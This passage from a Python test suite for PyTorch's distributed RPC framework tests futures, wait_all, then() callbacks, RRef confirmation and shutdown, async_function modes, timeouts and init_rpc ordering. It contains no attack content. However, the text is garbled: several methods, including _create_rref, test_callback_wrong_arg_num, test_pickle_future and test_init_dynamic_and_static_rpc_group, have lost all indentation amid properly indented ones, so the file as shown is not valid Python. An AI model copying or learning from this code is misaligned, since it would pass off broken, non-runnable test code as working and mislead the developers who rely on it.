    # and set to unblock a hanging remote call.
    timed_out_rpc_event = None
    @staticmethod
    def timed_out_rpc():
        # Blocks on the remote side until the caller sets the event.
        RpcTest.timed_out_rpc_event.wait()
    @dist_init
    def test_wait_all_exit_early_python(self):
        """wait_all surfaces a Python UDF error even while another future
        (a blocked RPC) is still pending."""
        # Initialize the event in the subprocess.
        RpcTest.timed_out_rpc_event = Event()
        # Wait for all processes to initialize event.
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        dist.barrier()
        dst = worker_name((self.rank + 1) % self.world_size)
        fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
        fut2 = rpc.rpc_async(dst, raise_func)
        fut3 = rpc.rpc_async(dst, raise_func)
        # We should receive the error from fut2
        with self.assertRaisesRegex(ValueError, expected_err):
            torch.futures.wait_all([fut1, fut2, fut3])
        # Unblock RPC thread for fut1
        RpcTest.timed_out_rpc_event.set()
    @dist_init
    def test_wait_all_exit_early_builtin(self):
        """wait_all surfaces a builtin-op error (shape mismatch) even while
        another future (a blocked RPC) is still pending."""
        # Initialize the event in the subprocess.
        RpcTest.timed_out_rpc_event = Event()
        # Wait for all processes to initialize event.
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        dist.barrier()
        dst = worker_name((self.rank + 1) % self.world_size)
        fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
        # Mismatched tensor sizes make torch.add fail remotely.
        fut2 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
        fut3 = rpc.rpc_async(dst, torch.add, args=(torch.rand(10), torch.rand(5)))
        # We should receive the error from fut2
        with self.assertRaisesRegex(RuntimeError, "size of tensor"):
            torch.futures.wait_all([fut1, fut2, fut3])
        # Unblock RPC thread for fut1
        RpcTest.timed_out_rpc_event.set()
    @dist_init
    def test_wait_all_exit_early_script_function(self):
        """wait_all surfaces a TorchScript function error even while another
        future (a blocked RPC) is still pending."""
        # Initialize the event in the subprocess.
        RpcTest.timed_out_rpc_event = Event()
        # Wait for all processes to initialize event.
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        dist.barrier()
        dst = worker_name((self.rank + 1) % self.world_size)
        fut1 = rpc.rpc_async(dst, RpcTest.timed_out_rpc)
        fut2 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
        fut3 = rpc.rpc_async(dst, raise_func_script, args=(expected_err,))
        # We should receive the error from fut2
        with self.assertRaisesRegex(RuntimeError, expected_err):
            torch.futures.wait_all([fut1, fut2, fut3])
        # Unblock RPC thread for fut1
        RpcTest.timed_out_rpc_event.set()
    @dist_init
    def test_function_not_on_callee(self):
        """Calling a function the callee has deleted yields a serialization
        error on the caller instead of a crash."""
        # test that if a function does not exist on a callee, we don't crash,
        # instead we get an AttributeError indicating that the func does not exist.
        this_module = sys.modules[__name__]
        caller_worker = "worker0"
        callee_worker = "worker1"
        if self.rank == 1:
            # Use delattr to remove the binding of a func on this nodes
            delattr(this_module, "foo_add")
            # notify remote end that we have removed it.
            rpc.rpc_sync(caller_worker, set_value, args=(self.rank,))
        if self.rank == 0:
            # func exists on caller, but not callee.
            # wait for remote end to remove the binding of foo_add func.
            wait_for_value_future()
            # Ensure that we have the attribute on this module. Otherwise, the test could fail due to a caller-side pickling error.
            self.assertTrue(hasattr(this_module, "foo_add"))
            with self.assertRaisesRegex(
                RuntimeError, "RPC pickler does not serialize"
            ):
                rpc.rpc_sync(callee_worker, foo_add, args=())
    @dist_init
    def test_non_garbage_collected_user_rref_due_to_local_circular_dependency(self):
        """A UserRRef held alive by a local reference cycle must not break
        shutdown (the cycle keeps a and b — and a.rref — from being GC'd)."""
        dst_worker_name = worker_name((self.rank + 1) % self.world_size)
        a = MyClass(1)
        b = MyClass(2)
        # This is to make Python not garbage collect a and b.
        a.other = b
        b.other = a
        n = self.rank
        a.rref = rpc.remote(
            dst_worker_name,
            torch.add,
            args=(torch.ones(n, n), 2)
        )
    @dist_init(setup_rpc=False)
    def test_use_rref_after_shutdown(self):
        """Using a UserRRef after graceful shutdown raises descriptive errors
        for both to_here() and serialization (forking)."""
        rpc.init_rpc(
            name="worker%d" % self.rank,
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        n = self.rank + 1
        dst_rank = n % self.world_size
        rref = rpc.remote(
            worker_name(dst_rank),
            torch.add,
            args=(torch.ones(n, n), torch.ones(n, n)),
        )
        # pass in graceful=True to ensure that local UserRRefs are deleted.
        rpc.shutdown(graceful=True)
        with self.assertRaisesRegex(
            RuntimeError, "Cannot call to_here\\(\\) on it after deletion."
        ):
            rref.to_here()
        with self.assertRaisesRegex(
            RuntimeError, "Cannot call fork an UserRRef after deletion."
        ):
            import torch.distributed.rpc.internal as internal
            internal.serialize(rref)
    @staticmethod
    def _return_gpu_tensor():
        # Helper: returns a CUDA tensor on device 0.
        return torch.rand(3, 3).cuda(0)
    @staticmethod
    def _return_gpu_tensor_list():
        # Helper: returns CUDA tensors on devices 0 and 1.
        return [torch.rand(3, 3).cuda(0), torch.rand(3, 3).cuda(1)]
    @staticmethod
    def _gpu_tensor_list_arg(tensor_list):
        # Helper: accepts a tensor-list argument; returns a CPU tensor.
        return torch.rand(3, 3)
def _create_rref(self):
owner_rank = (self.rank + 2) % self.world_size
return rpc.remote(
worker_name(owner_rank),
torch.add,
args=(torch.zeros(2, 2), 1)
)
    @dist_init
    def test_user_rrefs_confirmed(self):
        """A UserRRef passed over rpc_sync is confirmed by its owner."""
        dst_rank = (self.rank + 1) % self.world_size
        rref = self._create_rref()
        ret = rpc.rpc_sync(
            worker_name(dst_rank),
            check_rref_confirmed,
            args=(rref,)
        )
        self.assertEqual(ret, True)
    @dist_init
    def test_user_rrefs_confirmed_remote(self):
        """A UserRRef passed over rpc.remote is confirmed by its owner."""
        dst_rank = (self.rank + 1) % self.world_size
        rref = self._create_rref()
        ret_rref = rpc.remote(
            worker_name(dst_rank),
            check_rref_confirmed,
            args=(rref,)
        )
        self.assertEqual(ret_rref.to_here(), True)
    @dist_init
    def test_rref_py_pickle_not_supported(self):
        """torch.save (Python pickler) on an RRef must raise; RRefs may only
        be serialized by the RPC-internal pickler."""
        local_rref = RRef(35)
        with TemporaryFileName() as fname:
            with self.assertRaisesRegex(RuntimeError, "Can not pickle rref in python pickler"):
                torch.save(local_rref, fname)
    @dist_init
    def test_remote_throw(self):
        """An exception raised in the remote function surfaces on to_here()."""
        rref = rpc.remote(worker_name((self.rank + 1) % self.world_size),
                          raise_or_inc,
                          args=(torch.ones(2),))
        with self.assertRaisesRegex(Exception, ".*Expected error.*"):
            rref.to_here()
    @dist_init
    def test_non_cont_tensors(self):
        """Non-contiguous tensors survive an RPC round trip with their values
        and non-contiguity preserved."""
        if self.rank == 0:
            # Create a non-contiguous tensor.
            t = torch.rand(5, 5)
            t_view = t.narrow(1, 2, 2)
            self.assertFalse(t_view.is_contiguous())
            t_cont = t_view.contiguous()
            self.assertTrue(t_cont.is_contiguous())
            self.assertEqual(t_view, t_cont)
            # Send non-cont tensor over RPC.
            next_rank = (self.rank + 1) % self.world_size
            t_ret = rpc.rpc_sync(worker_name(next_rank), non_cont_test, args=(t_view, t_cont))
            # Verify the returned tensor.
            self.assertEqual(t_view, t_ret)
            self.assertFalse(t_ret.is_contiguous())
    @dist_init
    def test_callback_simple(self):
        """A then() callback observes the completed RPC result; re-waiting the
        original future keeps returning the same value."""
        set_by_cb = concurrent.futures.Future()
        n = self.rank + 1
        def callback(fut):
            ret = fut.wait()
            self.assertEqual(ret, torch.ones(n, n) * 2)
            # Hand the callback's result to the test thread.
            set_by_cb.set_result(ret.clone() + 1)
        fut = rpc.rpc_async(
            worker_name(n % self.world_size),
            torch.add,
            args=(torch.ones(n, n), torch.ones(n, n))
        )
        fut.then(callback)
        self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
        self.assertEqual(set_by_cb.result(), torch.ones(n, n) * 2 + 1)
        self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
@dist_init
def test_callback_wrong_arg_num(self):
set_by_cb = concurrent.futures.Future()
n = self.rank + 1
fut = rpc.rpc_async(
worker_name(n % self.world_size),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n))
)
cb_fut = fut.then(my_function)
self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
with self.assertRaisesRegex(
RuntimeError,
"my\\_function\\(\\) missing 2 required positional arguments"
):
cb_fut.wait()
    @dist_init
    def test_callback_wrong_arg_type(self):
        """An exception inside a then() callback (misusing the Future arg)
        surfaces when waiting on the chained future."""
        dst = worker_name((self.rank + 1) % self.world_size)
        fut0 = rpc.rpc_async(dst, torch.add, args=(torch.ones(2, 2), 1))
        # The callback receives a Future, not a tensor, so x + 1 fails.
        fut1 = fut0.then(lambda x: x + 1)
        with self.assertRaisesRegex(
            RuntimeError,
            "unsupported operand type\\(s\\) for \\+"
        ):
            fut1.wait()
    @dist_init
    def test_callback_multi(self):
        """Multiple then() callbacks on one future each see the same result
        and each produce their own chained value."""
        num_cbs = 10
        n = self.rank + 1
        def callback(idx, fut):
            ret = fut.wait()
            self.assertEqual(ret, torch.ones(n, n) * 2)
            return ret + idx
        fut = rpc.rpc_async(
            worker_name(n % self.world_size),
            torch.add,
            args=(torch.ones(n, n), torch.ones(n, n))
        )
        cb_futs = []
        for idx in range(num_cbs):
            cb_futs.append(fut.then(partial(callback, idx)))
        self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
        for idx in range(num_cbs):
            self.assertEqual(
                cb_futs[idx].wait(),
                torch.ones(n, n) * 2 + idx
            )
        self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
    @dist_init
    def test_callback_chain(self):
        """then() callbacks compose: chaining N increment callbacks adds N."""
        n = self.rank + 1
        dst = worker_name(n % self.world_size)
        def callback(fut):
            return fut.wait() + 1
        fut = rpc.rpc_async(
            worker_name(n % self.world_size),
            torch.add,
            args=(torch.ones(n, n), 1)
        )
        num_cbs = 20
        for _ in range(num_cbs):
            fut = fut.then(callback)
        self.assertEqual(fut.wait(), torch.ones(n, n) + 1 + num_cbs)
    @dist_init
    def test_callback_in_rpc(self):
        """A remote function may itself chain a then() callback on a nested
        RPC and return the final value."""
        dst1 = worker_name((self.rank + 1) % self.world_size)
        dst2 = worker_name((self.rank + 2) % self.world_size)
        ret = rpc.rpc_sync(
            dst1,
            add_use_future_cb,
            args=(dst2, torch.ones(2, 2), 1, 2)
        )
        self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
    @dist_init
    def test_callback_with_ret(self):
        """A then() callback can launch a nested RPC (with its own chained
        callback) and return that nested result."""
        dst = worker_name((self.rank + 1) % self.world_size)
        def callback(fut0):
            # Nested RPC adds 1, then the inner callback adds 1 again.
            fut2 = rpc.rpc_async(
                dst,
                torch.add,
                args=(fut0.wait(), 1)
            ).then(lambda fut1: fut1.wait() + 1)
            return fut2.wait()
        fut3 = rpc.rpc_async(
            dst,
            torch.add,
            args=(torch.ones(2, 2), 1)
        ).then(callback)
        self.assertEqual(fut3.wait(), torch.ones(2, 2) + 3)
    @dist_init
    def test_callback_with_error(self):
        """A then() callback sees the original error on wait() and may raise
        its own error, which the chained future then carries."""
        dst = worker_name((self.rank + 1) % self.world_size)
        def callback(fut0):
            with self.assertRaisesRegex(ValueError, "Expected error"):
                fut0.wait()
            raise RuntimeError("Another expected error")
        fut1 = rpc.rpc_async(dst, raise_func).then(callback)
        with self.assertRaisesRegex(RuntimeError, "Another expected error"):
            fut1.wait()
    @dist_init
    def test_callback_none(self):
        """Passing None to then() is rejected with a TypeError."""
        dst = worker_name((self.rank + 1) % self.world_size)
        with self.assertRaisesRegex(
            TypeError,
            "incompatible function arguments."
        ):
            rpc.rpc_async(dst, raise_func).then(None)
    @dist_init
    def test_add_done_callback(self):
        """add_done_callback() runs after completion; a then() future is used
        to synchronize with the callback's side effect."""
        set_by_cb = False
        n = self.rank + 1
        def callback(fut):
            nonlocal set_by_cb
            fut.wait()
            set_by_cb = True
        fut = rpc.rpc_async(
            worker_name(n % self.world_size),
            torch.add,
            args=(torch.ones(n, n), torch.ones(n, n))
        )
        fut.add_done_callback(callback)
        fut_then = fut.then(lambda _: True)
        self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
        # We have no guarantee that the add_done_callback fn will execute before the test finishes.
        # Adding a 'then' callback that runs afterwards to guarantee we wait for the first callback
        fut_then.wait()
        self.assertTrue(set_by_cb)
        self.assertEqual(fut.wait(), torch.ones(n, n) * 2)
    @dist_init
    def test_mark_future_twice(self):
        """set_result() on an already-completed RPC future raises."""
        fut = rpc.rpc_async(
            worker_name((self.rank + 1) % self.world_size),
            torch.add,
            args=(torch.zeros(2, 2), 1)
        )
        self.assertEqual(fut.wait(), torch.zeros(2, 2) + 1)
        with self.assertRaisesRegex(
            RuntimeError,
            "Future can only be marked completed once"
        ):
            fut.set_result(1)
@dist_init
def test_pickle_future(self):
fut = torch.futures.Future()
errMsg = "Can not pickle torch.futures.Future"
dst = worker_name((self.rank + 1) % self.world_size)
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_sync(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.rpc_async(dst, fail_on_fut, args=(fut,))
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
rpc.remote(dst, fail_on_fut, args=(fut,))
    @dist_init
    def test_future_done(self):
        """done() is True after a successful wait()."""
        dst = worker_name((self.rank + 1) % self.world_size)
        fut = rpc.rpc_async(dst, torch.add, args=(torch.zeros(2), 1))
        fut.wait()
        self.assertTrue(fut.done())
    @dist_init
    def test_future_done_exception(self):
        """done() is True even when the future completed with an error."""
        dst = worker_name((self.rank + 1) % self.world_size)
        fut = rpc.rpc_async(dst, raise_func)
        with self.assertRaisesRegex(ValueError, "Expected error"):
            fut.wait()
        self.assertTrue(fut.done())
def _test_future_cb(self, func):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst1,
func,
args=(dst2, torch.ones(2, 2), 1, 2)
)
self.assertEqual(ret, torch.ones(2, 2) + 1 + 2)
    @dist_init
    def test_future_in_rpc(self):
        # UDF completes its Future via set_result.
        self._test_future_cb(add_use_future_set_result)
    @dist_init
    def test_future_nested_callback(self):
        # UDF completes its Future from a nested callback.
        self._test_future_cb(add_use_future_nested_cb)
    def _test_async_function_raise(self, mode):
        """An async-execution UDF that raises must surface the error to the
        caller in the given execution mode."""
        with self.assertRaisesRegex(RuntimeError, "Expected error"):
            self._run_func_in_mode(
                worker_name((self.rank + 1) % self.world_size),
                async_raise_func,
                mode
            )
    @dist_init
    def test_async_function_raise(self):
        # Synchronous RPC variant.
        self._test_async_function_raise(RPCExecMode.SYNC)
    @dist_init
    def test_async_function_raise_async(self):
        # rpc_async variant.
        self._test_async_function_raise(RPCExecMode.ASYNC)
    @dist_init
    def test_async_function_raise_remote(self):
        # rpc.remote variant.
        self._test_async_function_raise(RPCExecMode.REMOTE)
def _test_async_function_wrong_return_type(self, mode):
errMsg = (
"Functions decorated with @rpc\\.async_function must return a "
"torch\\.futures\\.Future object,"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
self._run_func_in_mode(
worker_name((self.rank + 1) % self.world_size),
async_wrong_type,
mode
)
    @dist_init
    def test_async_function_wrong_return_type(self):
        # Synchronous RPC variant.
        self._test_async_function_wrong_return_type(RPCExecMode.SYNC)
    @dist_init
    def test_async_function_wrong_return_type_async(self):
        # rpc_async variant.
        self._test_async_function_wrong_return_type(RPCExecMode.ASYNC)
    @dist_init
    def test_async_function_wrong_return_type_remote(self):
        # rpc.remote variant.
        self._test_async_function_wrong_return_type(RPCExecMode.REMOTE)
@dist_init
def test_async_function_simple(self):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(dst1, async_add, args=(dst2, torch.ones(2, 2), 1))
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _test_async_function(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
args = (dst2, torch.ones(2, 2), 1, 2)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + 3)
    @dist_init
    def test_async_function_with_future_ctor(self):
        # UDF constructs its own Future; sync RPC.
        self._test_async_function(async_add_with_future_ctor)
    @dist_init
    def test_async_function_with_future_ctor_remote(self):
        # Same UDF, via rpc.remote.
        self._test_async_function(
            async_add_with_future_ctor,
            RPCExecMode.REMOTE
        )
    @dist_init
    def test_async_function_chained(self):
        # UDF chains futures with then(); sync RPC.
        self._test_async_function(async_add_chained)
    @dist_init
    def test_async_function_chained_remote(self):
        # Chained-future UDF, via rpc.remote.
        self._test_async_function(async_add_chained, RPCExecMode.REMOTE)
    @dist_init
    def test_async_function_nested(self):
        # UDF issues nested RPCs; sync RPC.
        self._test_async_function(async_add_nested)
    @dist_init
    def test_async_function_nested_remote(self):
        # Nested-RPC UDF, via rpc.remote.
        self._test_async_function(async_add_nested, RPCExecMode.REMOTE)
    @dist_init
    def test_async_static_method(self):
        # async-execution staticmethod; sync RPC.
        self._test_async_function(AsyncExecutionClass.static_async_add)
    @dist_init
    def test_async_static_method_remote(self):
        # async-execution staticmethod, via rpc.remote.
        self._test_async_function(
            AsyncExecutionClass.static_async_add,
            RPCExecMode.REMOTE
        )
    @dist_init
    def test_async_class_method(self):
        # async-execution classmethod; sync RPC.
        self._test_async_function(AsyncExecutionClass.class_async_add)
    @dist_init
    def test_async_class_method_remote(self):
        # async-execution classmethod, via rpc.remote.
        self._test_async_function(
            AsyncExecutionClass.class_async_add,
            RPCExecMode.REMOTE
        )
    def _test_test_async_class_rref_proxy(self, mode=RPCExecMode.SYNC):
        """Exercise async-execution static/class/bound methods through the
        RRef proxy APIs (rpc_sync / rpc_async / remote).

        NOTE(review): the doubled "test_test" in the name looks like a typo,
        but it is kept because the public test methods below depend on it.
        """
        dst1 = worker_name((self.rank + 1) % self.world_size)
        dst2 = worker_name((self.rank + 2) % self.world_size)
        rref = rpc.remote(dst1, AsyncExecutionClass)
        x = torch.ones(2, 2)
        y = torch.ones(2, 2) + 1
        if mode == RPCExecMode.SYNC:
            ret = rref.rpc_sync().static_async_add(dst2, x, x, y)
            ret += rref.rpc_sync().class_async_add(dst2, x, x, y)
            ret += rref.rpc_sync().bound_async_add(dst2, x, x, y)
        elif mode == RPCExecMode.ASYNC:
            ret = rref.rpc_async().static_async_add(dst2, x, x, y).wait()
            ret += rref.rpc_async().class_async_add(dst2, x, x, y).wait()
            ret += rref.rpc_async().bound_async_add(dst2, x, x, y).wait()
        elif mode == RPCExecMode.REMOTE:
            ret = rref.remote().static_async_add(dst2, x, x, y).to_here()
            ret += rref.remote().class_async_add(dst2, x, x, y).to_here()
            ret += rref.remote().bound_async_add(dst2, x, x, y).to_here()
        # Each of the three calls yields x + x + y == 4x; summed over three calls.
        self.assertEqual(ret, 3 * 4 * x)
    @dist_init
    def test_async_class_rref_proxy(self):
        # rpc_sync proxy variant.
        self._test_test_async_class_rref_proxy()
    @dist_init
    def test_async_class_rref_proxy_async(self):
        # rpc_async proxy variant.
        self._test_test_async_class_rref_proxy(mode=RPCExecMode.ASYNC)
    @dist_init
    def test_async_class_rref_proxy_remote(self):
        # remote() proxy variant.
        self._test_test_async_class_rref_proxy(mode=RPCExecMode.REMOTE)
def _test_async_function_multi(self, fn, mode=RPCExecMode.SYNC):
dst1 = worker_name((self.rank + 1) % self.world_size)
dst2 = worker_name((self.rank + 2) % self.world_size)
num = 20
step = 3
args = (dst2, torch.ones(2, 2), num, step)
ret = self._run_func_in_mode(dst1, fn, mode, args=args)
self.assertEqual(ret, torch.ones(2, 2) + num * step)
    @dist_init
    def test_async_function_multi_chained(self):
        # Multi-step chained futures; sync RPC.
        self._test_async_function_multi(async_add_chained_multi)
    @dist_init
    def test_async_function_multi_chained_async(self):
        # Multi-step chained futures, via rpc_async.
        self._test_async_function_multi(
            async_add_chained_multi,
            RPCExecMode.ASYNC
        )
    @dist_init
    def test_async_function_multi_chained_remote(self):
        # Multi-step chained futures, via rpc.remote.
        self._test_async_function_multi(
            async_add_chained_multi,
            RPCExecMode.REMOTE
        )
    @dist_init
    def test_async_function_multi_fanout(self):
        # Fan-out of parallel futures; sync RPC.
        self._test_async_function_multi(async_add_multi_fanout)
    @dist_init
    def test_async_function_multi_fanout_async(self):
        # Fan-out of parallel futures, via rpc_async.
        self._test_async_function_multi(
            async_add_multi_fanout,
            RPCExecMode.ASYNC
        )
    @dist_init
    def test_async_function_multi_fanout_remote(self):
        # Fan-out of parallel futures, via rpc.remote.
        self._test_async_function_multi(
            async_add_multi_fanout,
            RPCExecMode.REMOTE
        )
    def _test_return_future(self, mode):
        """Returning a bare Future from a plain (non-async) UDF must fail to
        pickle in every execution mode."""
        with self.assertRaisesRegex(
            RuntimeError,
            "Can not pickle torch.futures.Future"
        ):
            self._run_func_in_mode(
                worker_name((self.rank + 1) % self.world_size),
                return_future,
                mode
            )
    @dist_init
    def test_return_future(self):
        # Synchronous RPC variant.
        self._test_return_future(RPCExecMode.SYNC)
    @dist_init
    def test_return_future_async(self):
        # rpc_async variant.
        self._test_return_future(RPCExecMode.ASYNC)
    @dist_init
    def test_return_future_remote(self):
        # rpc.remote variant.
        self._test_return_future(RPCExecMode.REMOTE)
    @dist_init
    def test_rref_timeout(self):
        """rpc.remote with a tiny timeout must fail RRef creation cleanly."""
        # This test is similar to ones in FaultyProcessGroupTest, but is meant to be
        # run with other backends besides ProcessGroup.
        if self.rank != 0:
            return
        dst_rank = (self.rank + 1) % self.world_size
        dst_worker = "worker{}".format(dst_rank)
        # 10 ms timeout
        rref = rpc.remote(dst_worker, my_sleep_func, args=(2, ), timeout=0.01)
        # Future corresponding to the remote creation should time out.
        expected_error = self.get_timeout_error_regex()
        with self.assertRaisesRegex(RuntimeError, expected_error):
            rref._get_future().wait()
        # Call to ensure pending callbacks are run.
        wait_until_pending_futures_and_users_flushed()
        with self.assertRaisesRegex(RuntimeError, "RRef creation"):
            rref.to_here()
        # Wait for the owner (rank 1) to observe and clean up the fork before
        # shutdown, so delete messages do not race RRef creation.
        wait_until_owners_and_forks_on_rank(1, 1, rank=1)
    @dist_init(setup_rpc=False)
    @sandcastle_skip_if(
        os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
        "init_pg_then_rpc does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
    )
    def test_init_pg_then_rpc(self):
        """Initializing the process group before RPC must leave both usable."""
        dist.init_process_group(
            backend="gloo",
            init_method=self.init_method,
            rank=self.rank,
            world_size=self.world_size,
        )
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        # Test RPC.
        next_rank = (self.rank + 1) % self.world_size
        ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
        self.assertEqual(ret, torch.ones(2, 2) + 1)
        # Test PG
        dist.barrier()
        rpc.shutdown()
    @dist_init(setup_rpc=False)
    @sandcastle_skip_if(
        os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
        "init_rpc_then_pg does not work with TCP init, see https://github.com/pytorch/pytorch/issues/41614."
    )
    def test_init_rpc_then_pg(self):
        """Initializing RPC before the process group must leave both usable."""
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        dist.init_process_group(
            backend="gloo",
            init_method=self.init_method,
            rank=self.rank,
            world_size=self.world_size,
        )
        # Test RPC.
        next_rank = (self.rank + 1) % self.world_size
        ret = rpc.rpc_sync(worker_name(next_rank), torch.add, args=(torch.ones(2, 2), 1))
        self.assertEqual(ret, torch.ones(2, 2) + 1)
        # Test PG
        dist.barrier()
        rpc.shutdown()
@dist_init
def test_wait_all_with_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
@dist_init
def test_wait_all_with_partial_exception(self):
futs = []
dst = worker_name((self.rank + 1) % self.world_size)
for _ in range(10):
futs.append(rpc.rpc_async(dst, torch.add, args=(torch.ones(2), 1)))
futs.append(rpc.rpc_async(dst, raise_func))
with self.assertRaisesRegex(ValueError, "Expected error"):
ret = torch.futures.wait_all(futs)
    @dist_init(setup_rpc=False)
    @sandcastle_skip_if(
        os.environ.get("RPC_INIT_WITH_TCP", None) == "1",
        "Test does not work with TCP init, see https://github.com/pytorch/pytorch/issues/46491",
    )
    def test_init_rpc_twice(self):
        """RPC must be re-initializable after a clean shutdown."""
        initialize_pg(self.file_init_method, self.rank, self.world_size)
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        rpc.shutdown()
        # Wait for all init to complete.
        dist.barrier()
        # Ensure rpc initialization works again.
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            world_size=self.world_size,
            rpc_backend_options=self.rpc_backend_options,
        )
        # Verify RPCs work after re-init.
        dst = worker_name((self.rank + 1) % self.world_size)
        rpc.rpc_sync(dst, torch.add, args=(torch.ones(2, 2), 1))
        rpc.rpc_sync(dst, foo_add, args=())
        rpc.shutdown()
    # Test init_rpc without world_size argument
    @dist_init(setup_rpc=False)
    def test_init_rpc_without_world_size(self):
        """Dynamic-membership init: init_rpc works with no world_size."""
        rpc.init_rpc(
            name=worker_name(self.rank),
            backend=self.rpc_backend,
            rank=self.rank,
            rpc_backend_options=self.rpc_backend_options,
        )
        # TODO: Need to sync before shutdown since ungraceful shutdown is not fully implemented
        # Using process_group initialization as sync (could also use store based barrier)
        dist.init_process_group(
            backend='gloo',
            init_method=self.file_init_method,
            rank=self.rank,
            world_size=self.world_size)
        rpc.shutdown(graceful=False)
    # Dynamic RPC new ranks communicate with existing ranks
    @dist_init(setup_rpc=False)
    def test_without_world_size_new_rank_can_communicated_with_existing_rank(self):
        """A rank that joins a dynamic RPC group late can RPC to rank 0."""
        # TODO: Using process group for synchronization to ensure rank 0 is created first
        dist.init_process_group(
            backend='gloo',
            init_method=self.file_init_method,
            rank=self.rank,
            world_size=self.world_size)
        if self.rank == 0:
            rpc.init_rpc(
                name=worker_name(self.rank),
                backend=self.rpc_backend,
                rank=self.rank,
                rpc_backend_options=self.rpc_backend_options,
            )
        # Rank 0 will be initialized with RPC after this barrier
        dist.barrier()
        if self.rank != 0:
            # Newly joined ranks will be able to communicate with rank 0, since that was created first
            rpc.init_rpc(
                name=worker_name(self.rank),
                backend=self.rpc_backend,
                rank=self.rank,
                rpc_backend_options=self.rpc_backend_options,
            )
            result = rpc.rpc_sync(worker_name(0), torch.add, args=(torch.tensor(1), torch.tensor(1)))
            self.assertEqual(torch.add(torch.tensor(1), torch.tensor(1)), result)
        # TODO: Remove the sync before shutdown and replace with graceful shutdown
        dist.barrier()
        rpc.shutdown(graceful=False)
    @dist_init(setup_rpc=False)
    def test_init_rpc_without_world_size_without_rank(self):
        """Omitting rank must fail for file, env, and tcp init methods."""
        # default initialization uses file init
        with self.assertRaisesRegex(ValueError, "rank parameter missing"):
            rpc.init_rpc(
                name=worker_name(self.rank),
                backend=self.rpc_backend,
                rpc_backend_options=self.rpc_backend_options,
            )
        # env init
        with self.assertRaisesRegex(ValueError, "environment variable RANK expected"):
            rpc_backend_options = rpc.TensorPipeRpcBackendOptions(init_method="env://")
            rpc.init_rpc(
                name=worker_name(self.rank),
                backend=self.rpc_backend,
                rpc_backend_options=rpc_backend_options,
            )
        # tcp init
        with self.assertRaisesRegex(ValueError, "rank parameter missing"):
            rpc_backend_options = rpc.TensorPipeRpcBackendOptions(init_method="tcp://127.0.0.1:23456")
            rpc.init_rpc(
                name=worker_name(self.rank),
                backend=self.rpc_backend,
                rpc_backend_options=rpc_backend_options,
            )
@dist_init(setup_rpc=False)
def test_init_dynamic_and_static_rpc_group(self):
# Initialize a static rpc group with size = self.world_size - 1
dist.init_process_group(
backend='gloo',
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size)
world_size_minus_one = self.world_size - 1
if self.rank < world_size_minus_one:
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=world_size_minus_one,
rpc_backend_options=self.rpc_backend_options,
)
dist.barrier()
# Attempt to add an additional dynamic group member
if self.rank == world_size_minus_one:
with self.assertRaisesRegex(RuntimeError, "RPC group mixes statically and dynamically\
initialized members which is not supported."):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
rpc_backend_options=self.rpc_backend_options,
)
    def test_wrong_types(self):
        """init_rpc must type-check `backend` and `rpc_backend_options`."""
        with self.assertRaisesRegex(
            TypeError,
            "Argument backend must be a member of BackendType",
        ):
            rpc.init_rpc(
                name=worker_name(self.rank),
                rank=self.rank,
                world_size=self.world_size,
                backend="TENSORPIPE",
            )
        with self.assertRaisesRegex(
            TypeError,
            "Argument rpc_backend_options must be an instance of RpcBackendOptions",
        ):
            rpc.init_rpc(
                name=worker_name(self.rank),
                rank=self.rank,
                world_size=self.world_size,
                backend=self.rpc_backend,
                rpc_backend_options={"init_method": self.init_method}
            )
